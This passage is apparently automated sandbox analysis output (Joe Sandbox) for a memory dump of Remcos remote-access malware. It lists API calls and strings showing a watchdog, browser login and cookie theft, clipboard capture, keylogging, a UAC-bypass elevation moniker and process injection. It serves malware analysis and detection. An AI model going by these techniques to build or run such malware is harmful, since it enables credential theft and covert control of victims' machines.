                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                            • API String ID: 65172268-860466531
                                                                                            • Opcode ID: 200a0184714d490d0ba0b4defa5ea6ad14bb453dc3729acd8178532fd6d1d07e
                                                                                            • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                            • Opcode Fuzzy Hash: 200a0184714d490d0ba0b4defa5ea6ad14bb453dc3729acd8178532fd6d1d07e
                                                                                            • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                            • API String ID: 1164774033-3681987949
                                                                                            • Opcode ID: 76fc6f2f8938e12f39c523e25d48290a13894f358b4903df99732470634f51ee
                                                                                            • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                            • Opcode Fuzzy Hash: 76fc6f2f8938e12f39c523e25d48290a13894f358b4903df99732470634f51ee
                                                                                            • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                            • API String ID: 3527384056-432212279
                                                                                            • Opcode ID: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                                            • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                            • Opcode Fuzzy Hash: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                                            • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                            • API String ID: 726551946-3025026198
                                                                                            • Opcode ID: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                                            • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                            • Opcode Fuzzy Hash: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                                            • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                            APIs
                                                                                            • OpenClipboard.USER32 ref: 004159C7
                                                                                            • EmptyClipboard.USER32 ref: 004159D5
                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                            • String ID:
                                                                                            • API String ID: 3520204547-0
                                                                                            • Opcode ID: e20a420068aeef0f1e8fb2ee20dbe7dc4de82fb71b06899c46137a2a509998a5
                                                                                            • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                            • Opcode Fuzzy Hash: e20a420068aeef0f1e8fb2ee20dbe7dc4de82fb71b06899c46137a2a509998a5
                                                                                            • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0$1$2$3$4$5$6$7
                                                                                            • API String ID: 0-3177665633
                                                                                            • Opcode ID: a67fb25c249552ee9189d14a7b82946051c82c8a43c29b1558aee354ad113b8a
                                                                                            • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                            • Opcode Fuzzy Hash: a67fb25c249552ee9189d14a7b82946051c82c8a43c29b1558aee354ad113b8a
                                                                                            • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                            • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                            • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                            • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                            • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                            • String ID: 8[G
                                                                                            • API String ID: 1888522110-1691237782
                                                                                            • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                            • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                            • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                            • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Object_wcslen
                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                            • API String ID: 240030777-3166923314
                                                                                            • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                            • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                            • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                            • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                            APIs
                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                            • GetLastError.KERNEL32 ref: 00419935
                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                            • String ID:
                                                                                            • API String ID: 3587775597-0
                                                                                            • Opcode ID: 8acc4e60abbd127f50a47cce2bf7a6c9aff27ad0628ee74ba6f6268c750313f0
                                                                                            • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                            • Opcode Fuzzy Hash: 8acc4e60abbd127f50a47cce2bf7a6c9aff27ad0628ee74ba6f6268c750313f0
                                                                                            • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                            • String ID: <D$<D$<D
                                                                                            • API String ID: 745075371-3495170934
                                                                                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                            • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                            • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                            • String ID:
                                                                                            • API String ID: 2341273852-0
                                                                                            • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                            • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                            • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                            • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                            • String ID: @CG$XCG$`HG$`HG$>G
                                                                                            • API String ID: 341183262-3780268858
                                                                                            • Opcode ID: 650a2c604283885341558d4c80f674c4545f87da0af4cf1bc821494a8c9d9062
                                                                                            • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                            • Opcode Fuzzy Hash: 650a2c604283885341558d4c80f674c4545f87da0af4cf1bc821494a8c9d9062
                                                                                            • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                            APIs
                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                            • API String ID: 2127411465-314212984
                                                                                            • Opcode ID: 122e46eacc1daa1132902a61cb7e51bea5718349c3cff33a5b231bf10be2746f
                                                                                            • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                            • Opcode Fuzzy Hash: 122e46eacc1daa1132902a61cb7e51bea5718349c3cff33a5b231bf10be2746f
                                                                                            • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                            Strings
                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                            • UserProfile, xrefs: 0040B227
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                            • API String ID: 2018770650-1062637481
                                                                                            • Opcode ID: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                                            • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                            • Opcode Fuzzy Hash: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                                            • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 3534403312-3733053543
                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                            • String ID:
                                                                                            • API String ID: 4043647387-0
                                                                                            • Opcode ID: 34a35fb80ce348306b7ea12774f85c8e72a5665ed38fc8cc2b943c529c65861d
                                                                                            • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                            • Opcode Fuzzy Hash: 34a35fb80ce348306b7ea12774f85c8e72a5665ed38fc8cc2b943c529c65861d
                                                                                            • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                            • String ID:
                                                                                            • API String ID: 276877138-0
                                                                                            • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                            • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                            • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                            • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                            APIs
                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
